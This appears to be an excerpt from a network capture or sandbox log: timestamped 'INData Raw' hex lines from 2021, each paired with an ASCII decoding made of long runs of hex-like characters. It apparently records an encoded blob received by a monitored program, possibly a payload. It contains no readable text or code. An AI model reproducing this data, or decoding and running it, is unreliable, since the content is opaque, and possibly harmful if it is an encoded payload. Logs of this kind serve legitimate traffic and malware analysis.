                        2021-09-14 14:17:56 UTC236INData Raw: 2d 31 32 38 32 37 44 2d 38 32 2d 2d 33 31 44 2d 35 31 44 2d 35 2d 38 2d 38 2d 35 2d 37 2d 31 31 32 38 31 31 39 2d 35 32 2d 2d 32 2d 31 2d 45 2d 32 2d 35 2d 37 2d 33 2d 32 2d 38 2d 38 2d 37 32 2d 2d 33 2d 31 2d 32 2d 45 31 2d 2d 32 2d 34 2d 2d 2d 31 2d 31 2d 38 2d 38 2d 37 2d 32 31 32 38 2d 45 35 31 32 38 31 31 39 2d 38 2d 2d 2d 31 31 32 38 2d 45 31 31 32 38 2d 45 35 2d 37 2d 37 2d 35 2d 45 2d 45 2d 45 2d 45 2d 45 2d 35 2d 2d 2d 2d 31 32 38 32 42 35 2d 35 32 2d 2d 31 2d 45 31 44 2d 35 2d 38 2d 2d 2d 33 2d 32 2d 45 2d 45 31 31 38 32 42 31 2d 35 32 2d 2d 32 2d 45 2d 45 2d 45 2d 36 2d 2d 2d 31 2d 32 31 32 38 32 45 31 2d 35 2d 37 2d 32 2d 32 31 32 33 35 2d 33 2d 36 31 32 33 35 2d 36 32 2d 2d 32 31 32 33 35 2d 45 2d 32 2d 34 2d 2d 2d 31 2d 38 31 43 2d 36 2d 37
                        Data Ascii: -12827D-82--31D-51D-5-8-8-5-7-1128119-52--2-1-E-2-5-7-3-2-8-8-72--3-1-2-E1--2-4---1-1-8-8-7-2128-E5128119-8---1128-E1128-E5-7-7-5-E-E-E-E-E-5----1282B5-52--1-E1D-5-8---3-2-E-E1182B1-52--2-E-E-E-6---1-21282E1-5-7-2-21235-3-61235-62--21235-E-2-4---1-81C-6-7
                        2021-09-14 14:17:56 UTC243INData Raw: 44 42 35 32 38 35 39 41 45 33 45 43 36 41 41 34 41 37 36 41 34 42 46 43 38 34 35 34 32 41 45 33 34 33 43 2d 32 44 31 44 36 42 36 43 37 35 42 38 39 42 38 33 32 46 44 38 35 35 34 41 36 31 42 37 37 41 43 33 37 34 43 32 46 35 2d 2d 41 35 41 35 33 34 33 45 37 37 35 31 32 41 42 35 32 33 32 44 38 39 39 36 41 36 43 44 39 39 37 46 44 42 36 2d 35 45 36 37 41 39 2d 36 39 33 34 41 45 32 31 41 42 44 36 37 37 35 2d 31 43 36 45 44 32 42 41 38 36 35 32 46 41 2d 46 31 35 42 36 2d 46 2d 32 37 31 46 35 45 41 41 32 2d 35 44 43 31 45 35 2d 32 45 37 34 44 31 39 44 38 38 39 36 46 2d 44 42 38 41 38 2d 34 37 36 32 36 2d 34 35 41 36 31 37 34 41 32 33 37 44 37 35 46 39 31 41 39 41 36 45 45 42 43 35 38 2d 45 35 31 42 43 2d 32 37 36 2d 41 32 44 35 2d 2d 42 38 31 43 37 33 43 35 31 43
                        Data Ascii: DB52859AE3EC6AA4A76A4BFC84542AE343C-2D1D6B6C75B89B832FD8554A61B77AC374C2F5--A5A5343E77512AB5232D8996A6CD997FDB6-5E67A9-6934AE21ABD6775-1C6ED2BA8652FA-F15B6-F-271F5EAA2-5DC1E5-2E74D19D8896F-DB8A8-47626-45A6174A237D75F91A9A6EEBC58-E51BC-276-A2D5--B81C73C51C
                        2021-09-14 14:17:56 UTC250INData Raw: 32 38 35 33 33 35 43 44 2d 33 43 45 37 33 35 37 37 36 37 35 46 37 34 32 2d 42 2d 32 45 37 34 42 33 43 45 38 42 32 36 37 37 45 37 34 36 36 2d 31 43 31 37 34 37 37 34 38 42 45 43 36 37 35 31 42 42 2d 41 32 43 42 42 43 44 38 33 42 38 35 31 34 32 37 37 41 37 37 44 41 33 2d 43 32 45 32 37 33 36 38 38 44 41 37 37 44 45 44 32 33 45 37 36 45 34 44 44 43 43 32 31 43 42 2d 33 31 39 33 39 45 39 34 42 41 42 33 39 46 44 2d 39 33 42 43 32 39 35 44 42 45 45 37 39 41 46 34 34 37 41 37 37 35 38 43 37 32 45 35 41 32 44 42 41 2d 37 42 45 38 46 41 32 31 36 41 43 32 33 38 46 33 41 44 36 32 46 32 46 45 42 32 46 42 33 2d 2d 35 45 42 46 39 44 43 42 42 34 37 32 46 43 38 2d 31 41 44 43 35 2d 34 45 41 33 45 31 32 39 43 46 2d 32 36 43 2d 36 39 31 43 38 39 42 42 2d 37 37 34 34 34 46
                        Data Ascii: 285335CD-3CE73577675F742-B-2E74B3CE8B2677E7466-1C1747748BEC6751BB-A2CBBCD83B8514277A77DA3-C2E273688DA77DED23E76E4DDCC21CB-31939E94BAB39FD-93BC295DBEE79AF447A7758C72E5A2DBA-7BE8FA216AC238F3AD62F2FEB2FB3--5EBF9DCBB472FC8-1ADC5-4EA3E129CF-26C-691C89BB-77444F
                        2021-09-14 14:17:56 UTC257INData Raw: 34 37 42 45 34 2d 38 46 33 43 45 42 44 46 32 38 45 41 39 45 36 39 32 36 38 34 37 35 46 45 45 39 43 46 44 33 34 46 37 44 2d 44 31 46 34 2d 38 33 2d 31 46 37 35 32 31 46 36 37 32 39 42 37 36 41 46 2d 32 46 42 46 36 39 35 31 43 31 34 36 44 2d 45 37 33 32 33 31 45 38 44 2d 35 39 37 32 43 43 38 33 2d 41 31 33 33 33 43 37 2d 45 44 32 43 35 32 32 38 37 2d 46 46 2d 31 36 38 41 34 32 38 34 44 2d 34 44 41 39 38 41 39 43 45 38 31 33 34 36 39 32 33 43 43 39 34 35 32 38 45 33 32 39 38 36 32 35 33 39 34 37 35 41 33 43 34 45 41 36 41 33 45 2d 33 34 46 33 2d 34 33 31 39 32 31 36 33 35 32 2d 44 38 2d 39 39 33 37 31 36 39 33 46 36 43 43 43 38 46 33 45 39 33 32 35 44 35 39 32 32 42 35 37 44 33 36 2d 39 43 41 36 36 35 37 44 2d 43 46 34 42 31 36 46 43 34 39 2d 33 38 44 37 38
                        Data Ascii: 47BE4-8F3CEBDF28EA9E69268475FEE9CFD34F7D-D1F4-83-1F7521F6729B76AF-2FBF6951C146D-E73231E8D-5972CC83-A1333C7-ED2C52287-FF-168A4284D-4DA98A9CE81346923CC94528E329862539475A3C4EA6A3E-34F3-4319216352-D8-99371693F6CCC8F3E9325D5922B57D36-9CA6657D-CF4B16FC49-38D78
                        2021-09-14 14:17:56 UTC264INData Raw: 37 46 36 2d 33 35 36 38 2d 31 35 39 38 37 35 34 37 31 46 43 35 2d 41 46 37 2d 42 2d 32 46 43 38 44 45 39 35 34 2d 42 35 45 41 34 43 44 45 35 41 36 34 37 39 35 32 31 34 2d 33 45 2d 46 37 34 42 41 31 41 45 34 45 46 39 37 34 44 46 39 36 32 46 32 31 33 45 42 33 43 2d 41 42 32 46 46 39 37 36 32 39 37 34 35 33 36 45 42 39 35 43 43 45 44 31 31 45 45 39 41 31 35 41 31 38 43 45 43 33 2d 38 44 41 38 43 34 46 2d 44 42 45 42 39 44 37 44 34 41 45 36 36 46 37 31 33 34 43 44 41 33 43 46 31 42 43 38 33 2d 2d 32 36 43 39 34 34 2d 35 43 31 43 42 43 32 46 32 33 43 42 43 37 42 41 33 32 39 43 45 46 39 38 37 33 45 2d 32 45 42 38 36 45 34 39 45 44 41 33 32 37 36 34 36 46 34 44 39 43 42 45 35 31 45 46 36 35 45 38 31 31 38 41 42 46 41 32 42 43 41 32 44 38 38 31 42 44 42 42 42 38
                        Data Ascii: 7F6-3568-159875471FC5-AF7-B-2FC8DE954-B5EA4CDE5A64795214-3E-F74BA1AE4EF974DF962F213EB3C-AB2FF9762974536EB95CCED11EE9A15A18CEC3-8DA8C4F-DBEB9D7D4AE66F7134CDA3CF1BC83--26C944-5C1CBC2F23CBC7BA329CEF9873E-2EB86E49EDA327646F4D9CBE51EF65E8118ABFA2BCA2D881BDBBB8
                        2021-09-14 14:17:56 UTC272INData Raw: 42 33 37 36 46 35 41 36 2d 41 42 46 32 46 43 35 33 45 31 32 33 39 44 37 36 43 45 34 45 33 42 33 35 31 43 42 32 39 41 32 2d 41 36 31 35 37 38 44 38 2d 41 43 46 33 2d 37 42 32 41 2d 46 45 41 2d 2d 31 34 35 46 38 41 37 44 42 36 35 38 41 36 42 43 39 39 43 35 37 35 41 31 2d 37 37 33 46 46 36 2d 45 32 39 37 32 31 41 2d 45 45 41 42 34 44 32 41 33 33 35 41 2d 34 32 41 37 41 42 43 41 39 44 33 39 41 36 34 32 35 33 32 34 42 35 35 38 36 46 39 45 42 32 43 33 42 31 34 42 38 2d 31 2d 39 34 37 43 34 38 35 35 43 45 36 32 39 31 35 46 42 37 41 43 2d 44 31 31 33 36 35 38 36 41 45 31 31 44 34 43 36 41 39 32 31 2d 31 45 42 31 33 43 45 45 45 43 43 33 32 2d 38 33 2d 36 33 31 45 33 38 45 31 37 41 38 41 32 43 36 2d 39 34 35 44 36 36 36 41 39 32 39 44 36 31 2d 45 32 36 34 38 31 45
                        Data Ascii: B376F5A6-ABF2FC53E1239D76CE4E3B351CB29A2-A61578D8-ACF3-7B2A-FEA--145F8A7DB658A6BC99C575A1-773FF6-E29721A-EEAB4D2A335A-42A7ABCA9D39A6425324B5586F9EB2C3B14B8-1-947C4855CE62915FB7AC-D1136586AE11D4C6A921-1EB13CEEECC32-83-631E38E17A8A2C6-945D666A929D61-E26481E
                        2021-09-14 14:17:56 UTC279INData Raw: 39 35 2d 36 31 34 44 41 44 41 37 33 35 31 35 31 45 39 32 32 44 42 46 46 31 36 2d 2d 34 35 36 42 41 44 43 44 46 35 45 39 41 2d 42 43 38 33 37 38 43 32 45 38 41 39 34 46 31 38 32 44 43 31 45 33 36 37 31 37 44 34 37 33 37 34 39 36 34 31 38 35 46 38 41 41 2d 33 45 35 46 31 31 44 34 44 41 37 31 38 33 34 2d 44 2d 46 37 32 44 39 37 34 45 33 37 44 35 37 39 33 36 34 41 35 32 42 35 35 39 44 32 42 32 37 43 31 46 37 43 46 38 42 2d 33 42 38 44 32 31 32 39 38 37 41 41 34 39 33 43 34 38 36 41 2d 41 37 44 32 2d 37 38 44 36 35 38 31 41 39 46 36 38 39 31 33 35 32 2d 36 44 42 37 46 42 35 33 31 38 35 34 39 32 32 44 45 41 45 33 43 39 41 2d 39 36 35 41 31 2d 32 35 41 34 34 39 32 41 43 42 44 34 41 37 43 33 2d 31 41 45 35 33 37 43 42 41 31 35 39 2d 44 2d 2d 38 44 46 44 46 37 31
                        Data Ascii: 95-614DADA735151E922DBFF16--456BADCDF5E9A-BC8378C2E8A94F182DC1E36717D47374964185F8AA-3E5F11D4DA71834-D-F72D974E37D579364A52B559D2B27C1F7CF8B-3B8D212987AA493C486A-A7D2-78D6581A9F6891352-6DB7FB531854922DEAE3C9A-965A1-25A4492ACBD4A7C3-1AE537CBA159-D--8DFDF71
                        2021-09-14 14:17:56 UTC286INData Raw: 31 41 36 35 45 31 32 45 39 36 35 37 38 43 41 45 46 37 44 39 46 41 36 35 34 32 38 35 32 35 44 2d 43 39 34 46 35 46 38 39 38 41 35 39 41 39 38 36 37 46 35 36 36 46 45 33 41 37 42 35 39 43 33 42 39 44 34 32 38 38 2d 41 44 36 34 37 44 44 41 45 42 45 33 41 37 43 35 38 35 31 2d 44 44 44 33 34 39 39 33 42 38 44 2d 39 39 31 34 31 35 35 42 37 32 41 44 46 33 33 32 39 43 44 38 2d 34 34 32 31 45 31 36 39 45 41 36 38 35 34 42 31 42 41 41 43 35 41 45 46 2d 42 44 34 39 2d 34 45 37 41 38 37 36 44 35 34 34 35 44 42 45 34 39 42 34 33 46 33 39 33 41 37 36 33 44 41 38 33 33 41 43 38 33 41 38 35 43 39 39 31 45 45 45 36 2d 46 36 33 34 34 2d 41 33 42 41 37 39 39 31 46 35 41 34 34 39 37 46 37 43 32 31 41 35 38 45 42 44 43 39 38 46 34 44 34 42 35 46 34 38 33 35 41 41 35 43 45 31
                        Data Ascii: 1A65E12E96578CAEF7D9FA65428525D-C94F5F898A59A9867F566FE3A7B59C3B9D4288-AD647DDAEBE3A7C5851-DDD34993B8D-9914155B72ADF3329CD8-4421E169EA6854B1BAAC5AEF-BD49-4E7A876D5445DBE49B43F393A763DA833AC83A85C991EEE6-F6344-A3BA7991F5A4497F7C21A58EBDC98F4D4B5F4835AA5CE1
                        2021-09-14 14:17:56 UTC293INData Raw: 34 32 41 38 43 2d 32 33 44 2d 36 45 31 38 37 46 35 42 39 43 36 38 37 42 31 31 35 42 38 36 2d 42 39 33 46 41 44 42 41 38 43 45 37 35 2d 41 32 33 36 2d 35 46 35 43 36 2d 2d 41 46 38 35 42 31 45 42 33 2d 41 38 42 44 46 2d 37 39 35 36 36 43 31 34 2d 38 41 34 33 42 43 2d 32 36 34 44 38 42 33 46 36 39 36 38 31 34 34 33 33 32 32 31 46 42 37 35 45 39 39 31 46 2d 44 45 33 2d 35 35 38 2d 32 37 2d 34 38 44 41 41 43 39 39 46 46 46 34 31 35 46 34 36 41 45 38 39 43 34 2d 44 31 35 44 43 36 2d 2d 33 37 42 44 43 42 43 45 33 38 43 43 43 43 31 35 38 43 2d 44 34 34 32 34 31 32 34 41 39 35 2d 34 39 45 32 44 37 45 44 46 41 37 45 38 41 43 31 45 37 44 31 35 42 41 38 2d 45 35 45 46 43 32 38 33 36 45 33 46 43 39 44 31 41 45 44 43 43 43 31 43 37 44 46 2d 2d 45 45 34 44 37 44 42 36
                        Data Ascii: 42A8C-23D-6E187F5B9C687B115B86-B93FADBA8CE75-A236-5F5C6--AF85B1EB3-A8BDF-79566C14-8A43BC-264D8B3F696814433221FB75E991F-DE3-558-27-48DAAC99FFF415F46AE89C4-D15DC6--37BDCBCE38CCCC158C-D4424124A95-49E2D7EDFA7E8AC1E7D15BA8-E5EFC2836E3FC9D1AEDCCC1C7DF--EE4D7DB6
                        2021-09-14 14:17:56 UTC301INData Raw: 42 35 38 37 2d 42 36 46 34 46 41 33 41 44 31 38 32 37 2d 38 34 2d 42 33 45 38 37 32 42 43 34 32 38 42 39 33 37 42 34 34 31 36 46 44 2d 31 34 44 38 45 36 39 2d 2d 42 36 32 35 43 31 46 33 32 42 31 45 39 43 44 31 33 32 36 35 33 35 45 36 43 32 46 36 39 32 36 2d 44 35 35 37 33 34 39 43 46 2d 2d 32 36 2d 46 38 45 38 46 2d 41 39 41 41 41 38 43 42 31 2d 42 35 41 37 34 43 33 39 35 38 45 2d 37 36 41 38 2d 39 33 45 31 33 32 31 35 38 41 38 2d 32 42 34 37 39 37 43 2d 2d 44 41 37 33 46 34 33 36 34 39 46 32 42 39 33 42 44 43 36 38 37 35 32 35 31 2d 32 39 39 37 32 39 43 34 46 41 31 42 44 33 43 44 34 31 31 34 39 38 34 32 33 32 38 32 42 37 34 2d 42 39 45 45 33 41 45 2d 37 46 33 35 32 32 33 35 31 39 35 31 31 46 41 33 33 36 46 31 31 34 31 39 34 36 43 35 41 44 33 46 36 34 39
                        Data Ascii: B587-B6F4FA3AD1827-84-B3E872BC428B937B4416FD-14D8E69--B625C1F32B1E9CD1326535E6C2F6926-D557349CF--26-F8E8F-A9AAA8CB1-B5A74C3958E-76A8-93E132158A8-2B4797C--DA73F43649F2B93BDC6875251-299729C4FA1BD3CD411498423282B74-B9EE3AE-7F35223519511FA336F1141946C5AD3F649
                        2021-09-14 14:17:56 UTC308INData Raw: 39 41 38 32 46 35 2d 45 34 34 46 34 31 42 39 2d 2d 36 45 41 38 41 36 34 39 37 37 45 41 37 44 44 34 45 33 45 37 32 37 35 33 37 35 31 46 2d 41 35 39 45 46 37 43 43 46 39 42 46 36 39 31 45 44 2d 42 45 46 46 36 41 43 39 2d 35 2d 33 35 32 35 45 44 38 45 46 35 46 33 33 46 33 43 44 31 37 41 46 33 43 42 41 37 45 39 35 38 34 36 32 41 33 46 32 2d 44 36 43 39 43 46 31 43 42 42 2d 35 41 41 36 35 35 2d 32 42 46 35 37 2d 42 43 36 45 36 34 35 32 38 44 34 41 45 38 39 33 36 2d 44 38 2d 46 42 33 41 46 32 37 42 42 43 31 32 43 43 36 39 37 41 45 38 36 39 44 34 33 2d 34 32 45 31 2d 41 44 46 36 33 37 33 31 2d 34 46 34 36 38 43 44 44 33 35 2d 39 46 36 39 32 33 45 32 38 46 35 43 42 38 36 39 39 35 36 35 45 37 39 45 33 36 2d 36 43 32 44 42 31 38 34 41 38 32 42 41 32 33 31 32 34 46
                        Data Ascii: 9A82F5-E44F41B9--6EA8A64977EA7DD4E3E72753751F-A59EF7CCF9BF691ED-BEFF6AC9-5-3525ED8EF5F33F3CD17AF3CBA7E958462A3F2-D6C9CF1CBB-5AA655-2BF57-BC6E64528D4AE8936-D8-FB3AF27BBC12CC697AE869D43-42E1-ADF63731-4F468CDD35-9F6923E28F5CB8699565E79E36-6C2DB184A82BA23124F
                        2021-09-14 14:17:56 UTC315INData Raw: 39 43 38 34 32 34 44 36 41 44 38 39 37 37 44 31 34 37 31 37 36 32 46 41 31 43 34 33 39 41 45 35 32 36 44 32 38 45 43 34 35 2d 41 2d 33 37 45 31 42 41 31 43 39 2d 35 33 31 35 2d 38 32 2d 36 33 39 43 38 46 46 36 36 37 43 31 43 43 39 45 43 33 45 45 33 2d 34 45 38 35 39 35 42 34 38 31 35 33 37 39 32 33 46 35 37 44 33 35 39 37 36 34 41 46 33 43 44 43 43 36 37 39 34 37 39 37 31 43 35 44 38 38 44 38 35 42 34 38 39 43 36 2d 42 36 41 38 2d 44 32 37 33 39 45 45 38 33 37 43 34 36 46 45 35 38 35 45 39 39 44 38 36 36 32 42 37 37 39 32 33 34 36 37 45 44 2d 41 44 42 2d 2d 2d 35 38 38 42 41 32 36 39 39 38 33 37 43 45 2d 32 46 34 43 42 31 35 42 35 33 46 39 37 45 35 45 43 44 45 45 32 45 39 37 33 31 41 46 46 46 43 39 33 35 33 46 41 37 34 43 33 35 39 34 39 35 35 39 31 36 35
                        Data Ascii: 9C8424D6AD8977D1471762FA1C439AE526D28EC45-A-37E1BA1C9-5315-82-639C8FF667C1CC9EC3EE3-4E8595B481537923F57D359764AF3CDCC67947971C5D88D85B489C6-B6A8-D2739EE837C46FE585E99D8662B77923467ED-ADB---588BA2699837CE-2F4CB15B53F97E5ECDEE2E9731AFFFC9353FA74C35949559165
                        2021-09-14 14:17:56 UTC322INData Raw: 43 33 31 31 42 35 37 38 37 46 43 45 41 42 39 35 35 36 45 35 38 45 36 36 34 32 32 38 38 36 44 32 31 41 36 33 34 38 32 37 42 2d 32 41 39 31 31 41 33 35 31 32 42 34 33 39 35 34 45 36 43 38 33 37 42 35 36 35 2d 36 32 32 35 38 44 34 36 43 36 41 35 36 32 46 45 43 31 37 2d 44 45 32 44 31 31 39 33 32 44 35 43 42 37 2d 32 41 44 41 37 45 41 43 2d 46 34 32 39 45 46 44 45 37 45 38 38 35 35 45 37 34 2d 45 35 37 38 2d 45 31 46 33 45 45 43 46 31 43 41 45 42 45 39 36 38 42 46 42 2d 43 45 38 35 34 46 46 43 44 36 44 43 39 38 32 37 37 42 38 42 35 33 44 35 36 37 32 45 41 45 37 32 39 33 42 39 36 38 45 34 33 46 38 42 42 39 42 39 42 34 45 38 37 43 43 34 45 37 36 35 34 45 41 2d 39 38 33 42 45 31 35 43 45 38 37 39 43 37 33 44 42 35 38 46 35 46 31 36 42 46 46 45 45 33 31 33 45 39
                        Data Ascii: C311B5787FCEAB9556E58E66422886D21A634827B-2A911A3512B43954E6C837B565-62258D46C6A562FEC17-DE2D11932D5CB7-2ADA7EAC-F429EFDE7E8855E74-E578-E1F3EECF1CAEBE968BFB-CE854FFCD6DC98277B8B53D5672EAE7293B968E43F8BB9B9B4E87CC4E7654EA-983BE15CE879C73DB58F5F16BFFEE313E9
                        2021-09-14 14:17:56 UTC330INData Raw: 34 34 41 34 33 32 38 42 44 2d 33 44 43 32 34 35 32 44 39 42 37 31 46 46 44 43 37 32 32 44 46 39 42 34 34 33 36 46 35 39 33 38 37 35 46 44 32 38 39 44 43 35 38 37 34 34 32 39 31 31 2d 33 44 32 31 38 38 41 46 42 41 42 31 37 43 46 38 34 45 34 2d 45 31 46 43 41 35 33 35 42 44 2d 32 35 35 45 46 39 41 43 2d 35 37 32 45 37 44 45 36 39 42 36 31 2d 34 31 35 37 46 44 44 41 37 43 46 38 32 41 45 42 44 43 41 43 43 33 2d 37 34 41 38 37 38 33 45 44 32 45 2d 45 32 38 38 33 39 46 43 36 31 42 42 37 38 44 41 33 38 43 44 34 34 35 31 36 36 32 45 31 42 37 44 37 39 45 32 45 34 43 35 38 31 44 39 42 32 37 39 46 34 31 35 42 31 39 31 41 2d 35 39 31 44 32 43 38 32 34 43 46 31 41 42 35 2d 39 42 46 31 31 2d 46 36 46 33 45 35 34 33 32 34 37 39 36 37 2d 35 39 39 32 33 34 36 39 45 32 2d
                        Data Ascii: 44A4328BD-3DC2452D9B71FFDC722DF9B4436F593875FD289DC587442911-3D2188AFBAB17CF84E4-E1FCA535BD-255EF9AC-572E7DE69B61-4157FDDA7CF82AEBDCACC3-74A8783ED2E-E28839FC61BB78DA38CD4451662E1B7D79E2E4C581D9B279F415B191A-591D2C824CF1AB5-9BF11-F6F3E543247967-59923469E2-
                        2021-09-14 14:17:56 UTC337INData Raw: 43 44 35 38 44 32 33 41 42 32 2d 33 46 36 32 43 36 44 2d 39 43 41 44 36 45 38 35 46 42 41 35 45 42 45 42 34 33 43 39 34 46 42 31 46 39 32 33 33 34 32 38 32 43 2d 37 34 36 2d 38 37 46 37 34 44 43 42 35 46 34 44 32 34 45 32 36 37 32 41 2d 44 32 38 46 46 32 45 46 44 33 2d 33 41 38 46 36 43 46 42 37 34 41 32 31 42 34 36 39 42 35 34 44 31 34 42 35 41 42 44 45 33 43 31 39 33 43 37 43 37 2d 46 2d 36 39 38 35 33 39 38 46 32 41 35 36 33 42 45 31 34 43 34 45 34 43 2d 38 2d 33 43 39 39 38 38 45 33 34 36 37 41 33 31 36 34 34 44 45 36 33 2d 32 45 39 38 35 42 34 36 43 32 42 46 46 43 36 45 45 34 38 2d 31 35 45 31 38 42 35 35 42 41 36 38 42 39 42 45 43 34 41 38 35 41 44 41 46 36 31 2d 43 39 31 38 33 37 36 39 43 42 41 33 44 31 45 44 32 44 36 2d 45 44 45 37 34 43 46 31 43
                        Data Ascii: CD58D23AB2-3F62C6D-9CAD6E85FBA5EBEB43C94FB1F92334282C-746-87F74DCB5F4D24E2672A-D28FF2EFD3-3A8F6CFB74A21B469B54D14B5ABDE3C193C7C7-F-6985398F2A563BE14C4E4C-8-3C9988E3467A31644DE63-2E985B46C2BFFC6EE48-15E18B55BA68B9BEC4A85ADAF61-C9183769CBA3D1ED2D6-EDE74CF1C
                        2021-09-14 14:17:56 UTC344INData Raw: 45 37 41 35 39 41 46 33 42 42 32 32 35 37 42 36 2d 41 37 35 34 42 43 43 37 43 32 38 44 44 36 41 34 31 36 46 35 39 31 33 43 34 42 44 33 44 37 44 39 41 42 32 36 34 37 34 44 36 31 43 32 43 45 46 46 41 39 46 32 33 39 2d 44 32 42 34 34 44 33 43 36 34 31 32 46 43 44 35 33 33 42 36 31 44 34 46 41 31 31 37 34 46 32 42 36 36 37 46 2d 45 31 32 33 31 32 31 31 38 42 46 33 43 32 41 32 35 43 45 34 31 31 32 2d 33 44 46 2d 42 34 31 37 37 44 2d 41 34 44 33 45 32 44 37 33 36 36 45 32 42 2d 35 44 42 45 35 2d 34 43 39 45 2d 42 44 43 31 37 38 35 2d 34 45 36 43 37 42 45 2d 33 33 38 37 43 42 38 41 31 42 32 36 35 2d 2d 43 41 32 35 43 46 34 32 32 33 2d 38 41 44 46 38 37 33 37 45 44 32 43 31 45 36 2d 35 36 43 34 2d 46 34 2d 32 32 32 38 46 2d 35 37 35 38 41 38 34 32 43 2d 38 2d 38
                        Data Ascii: E7A59AF3BB2257B6-A754BCC7C28DD6A416F5913C4BD3D7D9AB26474D61C2CEFFA9F239-D2B44D3C6412FCD533B61D4FA1174F2B667F-E12312118BF3C2A25CE4112-3DF-B4177D-A4D3E2D7366E2B-5DBE5-4C9E-BDC1785-4E6C7BE-3387CB8A1B265--CA25CF4223-8ADF8737ED2C1E6-56C4-F4-2228F-5758A842C-8-8
                        2021-09-14 14:17:56 UTC351INData Raw: 41 32 34 32 34 43 32 41 44 31 45 34 35 33 31 43 34 44 31 34 46 36 31 38 35 2d 45 43 34 31 46 2d 43 34 43 38 39 42 37 34 37 34 43 38 36 36 41 37 36 32 45 32 2d 32 2d 46 44 43 35 2d 37 33 38 37 35 37 33 42 38 36 37 37 42 37 32 38 35 39 41 2d 33 44 38 34 36 38 36 35 37 44 36 32 45 37 38 41 33 39 39 33 2d 39 43 32 44 36 45 43 33 41 45 33 45 35 38 46 41 2d 46 35 39 32 43 39 34 2d 41 34 33 45 45 41 45 41 42 33 41 34 31 31 33 33 38 35 45 46 33 43 45 38 35 46 39 2d 36 2d 44 39 46 46 42 44 34 36 42 35 38 43 36 45 33 39 39 2d 2d 43 31 33 41 37 39 39 32 45 45 34 34 42 31 42 42 45 45 43 46 34 34 36 42 33 41 41 32 43 32 43 36 45 35 43 38 39 44 41 43 39 45 45 32 33 44 32 43 41 39 46 32 34 46 35 44 32 34 2d 2d 44 45 32 31 44 44 44 2d 33 38 43 33 32 36 33 32 44 36 2d 34
                        Data Ascii: A2424C2AD1E4531C4D14F6185-EC41F-C4C89B7474C866A762E2-2-FDC5-7387573B8677B72859A-3D8468657D62E78A3993-9C2D6EC3AE3E58FA-F592C94-A43EEAEAB3A4113385EF3CE85F9-6-D9FFBD46B58C6E399--C13A7992EE44B1BBEECF446B3AA2C2C6E5C89DAC9EE23D2CA9F24F5D24--DE21DDD-38C32632D6-4
                        2021-09-14 14:17:56 UTC359INData Raw: 43 38 31 45 46 32 35 37 36 46 38 45 35 46 38 39 35 41 34 46 39 46 39 35 31 34 2d 32 34 2d 43 38 33 2d 41 34 33 45 31 37 45 31 37 34 43 42 2d 35 39 37 42 44 37 37 45 44 43 31 39 44 38 32 43 45 2d 2d 45 45 41 35 46 38 41 32 42 34 38 34 43 41 42 42 38 38 46 42 45 34 31 44 32 43 2d 34 43 36 39 2d 44 31 42 42 2d 46 38 43 39 31 31 32 31 32 33 43 38 37 45 36 32 31 45 39 35 46 44 42 37 33 44 34 36 34 34 31 32 38 31 39 33 41 32 44 35 41 32 31 35 46 33 38 37 34 34 2d 41 35 38 42 43 38 33 37 37 38 34 45 43 45 45 36 44 46 32 46 31 43 45 2d 34 41 37 33 45 34 32 42 36 43 34 41 41 39 2d 31 42 39 2d 42 35 39 35 32 32 38 2d 36 46 45 46 38 37 46 2d 46 41 45 33 45 38 43 46 38 2d 41 37 43 37 2d 46 36 41 45 37 43 45 41 31 36 35 35 34 42 44 39 42 43 38 38 41 44 36 34 39 34 2d
                        Data Ascii: C81EF2576F8E5F895A4F9F9514-24-C83-A43E17E174CB-597BD77EDC19D82CE--EEA5F8A2B484CABB88FBE41D2C-4C69-D1BB-F8C9112123C87E621E95FDB73D4644128193A2D5A215F38744-A58BC837784ECEE6DF2F1CE-4A73E42B6C4AA9-1B9-B595228-6FEF87F-FAE3E8CF8-A7C7-F6AE7CEA16554BD9BC88AD6494-
                        2021-09-14 14:17:56 UTC366INData Raw: 45 39 45 35 41 41 42 41 2d 34 34 44 31 38 35 37 41 41 43 31 36 37 44 46 42 42 41 36 45 38 34 38 44 32 36 31 31 35 34 43 42 41 37 36 41 42 31 34 45 45 44 45 45 45 43 32 41 39 45 39 33 38 33 31 36 41 35 31 36 37 36 45 39 44 46 32 45 35 43 42 39 33 39 32 43 33 31 45 42 36 31 34 31 32 43 34 33 41 2d 41 33 45 34 46 46 38 43 34 43 37 31 35 39 31 33 46 2d 44 38 45 35 39 44 36 38 2d 38 37 35 32 36 41 44 38 35 43 32 32 37 46 39 45 41 43 45 37 44 33 42 44 36 34 42 37 45 33 42 39 37 2d 36 34 32 46 34 2d 39 46 31 46 37 36 2d 2d 44 46 42 41 38 33 44 41 38 39 42 35 41 32 34 33 42 42 32 31 41 41 33 35 32 43 32 43 36 39 35 42 43 34 45 2d 46 38 32 33 32 45 39 39 32 31 34 38 35 42 36 2d 33 36 31 45 37 35 35 32 44 41 32 43 33 2d 35 34 2d 32 32 39 34 37 43 2d 43 31 31 35 36
                        Data Ascii: E9E5AABA-44D1857AAC167DFBBA6E848D261154CBA76AB14EEDEEEC2A9E938316A51676E9DF2E5CB9392C31EB61412C43A-A3E4FF8C4C715913F-D8E59D68-87526AD85C227F9EACE7D3BD64B7E3B97-642F4-9F1F76--DFBA83DA89B5A243BB21AA352C2C695BC4E-F8232E9921485B6-361E7552DA2C3-54-22947C-C1156
                        2021-09-14 14:17:56 UTC373INData Raw: 2d 45 45 39 35 41 39 45 35 39 2d 39 36 34 41 44 43 34 42 45 34 32 36 31 31 45 32 42 38 32 39 41 46 37 41 42 33 46 43 34 36 38 33 43 31 37 41 41 36 33 37 41 45 38 44 46 33 34 34 42 41 31 32 43 31 46 39 44 34 43 36 41 35 35 41 39 42 32 38 45 32 31 2d 42 45 43 34 33 36 46 43 43 46 44 38 35 31 32 34 41 33 41 33 35 38 41 41 44 34 37 31 37 45 37 38 33 39 36 34 43 42 36 44 2d 44 42 38 32 41 37 46 36 39 31 42 33 44 32 34 39 2d 36 46 34 42 37 42 37 46 36 39 33 42 41 38 44 35 41 43 45 45 32 32 41 36 32 46 45 42 32 42 32 42 32 32 35 33 44 44 35 36 39 38 35 38 35 33 45 37 37 43 35 36 42 36 35 45 34 32 32 37 44 37 32 38 31 2d 34 36 41 35 34 32 33 46 37 36 38 34 39 43 34 31 35 42 32 31 46 39 39 37 41 36 35 44 35 34 41 31 42 46 44 46 38 46 35 42 45 43 34 33 39 34 41 35
